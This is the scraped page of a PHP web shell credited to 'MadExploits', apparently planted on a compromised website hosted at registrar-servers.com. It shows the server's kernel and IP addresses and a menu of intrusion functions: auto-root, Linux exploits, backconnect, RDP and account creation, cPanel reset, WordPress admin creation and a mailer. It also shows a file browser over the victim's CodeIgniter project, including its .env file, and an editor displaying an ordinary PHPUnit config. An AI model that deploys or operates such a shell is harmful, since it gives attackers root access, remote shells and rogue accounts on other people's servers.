Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.223
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
art.tradesense.co.ke /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
art
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
writable
[ DIR ]
drwxr-xr-x
.env
4.69
KB
-rw-r--r--
.gitignore
1.82
KB
-rw-r--r--
LICENSE
1.13
KB
-rw-r--r--
README.md
2.45
KB
-rw-r--r--
art.zip
10.92
MB
-rw-r--r--
composer.json
1.94
KB
-rw-r--r--
phpunit.xml.dist
2.01
KB
-rw-r--r--
spark
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpunit.xml.dist
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" bootstrap="system/Test/bootstrap.php" backupGlobals="false" colors="true" convertErrorsToExceptions="true" convertNoticesToExceptions="true" convertWarningsToExceptions="true" stopOnError="false" stopOnFailure="false" stopOnIncomplete="false" stopOnSkipped="false" xsi:noNamespaceSchemaLocation="https://schema.phpunit.de/9.3/phpunit.xsd"> <coverage includeUncoveredFiles="true" processUncoveredFiles="true"> <include> <directory suffix=".php">./app</directory> </include> <exclude> <directory suffix=".php">./app/Views</directory> <file>./app/Config/Routes.php</file> </exclude> <report> <clover outputFile="build/logs/clover.xml"/> <html outputDirectory="build/logs/html"/> <php outputFile="build/logs/coverage.serialized"/> <text outputFile="php://stdout" showUncoveredFiles="false"/> </report> </coverage> <testsuites> <testsuite name="App"> <directory>./tests</directory> </testsuite> </testsuites> <logging> <testdoxHtml outputFile="build/logs/testdox.html"/> <testdoxText outputFile="build/logs/testdox.txt"/> <junit outputFile="build/logs/logfile.xml"/> </logging> <php> <server name="app.baseURL" value="http://example.com/"/> <!-- Directory containing phpunit.xml --> <const name="HOMEPATH" value="./"/> <!-- Directory containing the Paths config file --> <const name="CONFIGPATH" value="./app/Config/"/> <!-- Directory containing the front controller (index.php) --> <const name="PUBLICPATH" value="./public/"/> <!-- Database configuration --> <!-- Uncomment to provide your own database for testing <env name="database.tests.hostname" value="localhost"/> <env name="database.tests.database" value="tests"/> <env name="database.tests.username" value="tests_user"/> <env name="database.tests.password" value=""/> <env name="database.tests.DBDriver" value="MySQLi"/> <env name="database.tests.DBPrefix" value="tests_"/> --> </php> </phpunit>
Close